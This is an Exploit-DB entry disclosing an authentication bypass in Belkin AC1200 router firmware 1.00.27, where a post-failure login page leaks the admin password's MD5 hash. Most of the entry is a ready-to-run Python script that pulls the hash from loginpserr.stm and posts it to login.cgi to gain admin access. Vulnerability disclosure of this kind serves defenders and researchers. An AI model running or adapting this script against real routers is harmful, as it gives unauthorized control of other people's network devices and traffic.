Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass

EDB-ID:

40081

CVE:

N/A

EDB Verified:

Author:

Gregory Smiley

Type:

webapps

Exploit:   /  

Platform:

CGI

Date:

2016-07-11

Vulnerable App: 
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on:F9K1113 v1


#1. Description:

#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
#exploited by extracting that hash value, and passing it in the pws field in a post request to
#login.cgi.

#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.



#2. Proof:

#Line 55 of loginpserr.stm contains the javascript code:

#var password = "md5hashofpassword";


#3. Exploit:
'''

#!/usr/bin/python


import urllib

import urllib2

import sys


router = raw_input('Enter IP address of your AC1200 to test: ')

page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()

test_page = page


vuln_string = 'var password = "'

if vuln_string in test_page:

	print 'Router is vulnerable.'
	answer = raw_input('Would you like to exploit the target? Y/N : ')


else:


	print 'Router is not vulnerable.'
	print 'exiting...'

sys.exit()


if (answer == 'y') or (answer == 'Y'):


	extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
	_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter


else:


	if (answer == 'n') or (answer == 'N'):
		print 'exiting...'

sys.exit()


#Assemble the POST request to /login.cgi



headers = {


'Host': router,

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',

'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language' : 'en-US,en;q=0.5',

'Accept-Encoding' : 'gzip, deflate',

'Referer' : 'http://'+router+'/',

'Connection': 'keep-alive',

'Content-Type': 'application/x-www-form-urlencoded'

}


data = {



'totalMSec':'0',

'pws': _hash,

'url':'status.stm',

'arc_action':'login',

'pws_temp': ''

}


data = urllib.urlencode(data)


#Sends the POST request with the hash in the pws field


req = urllib2.Request('http://'+router+'/login.cgi', data, headers)


response = urllib2.urlopen(req)

the_page = response.read()


print 'Exploit successful.'

print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services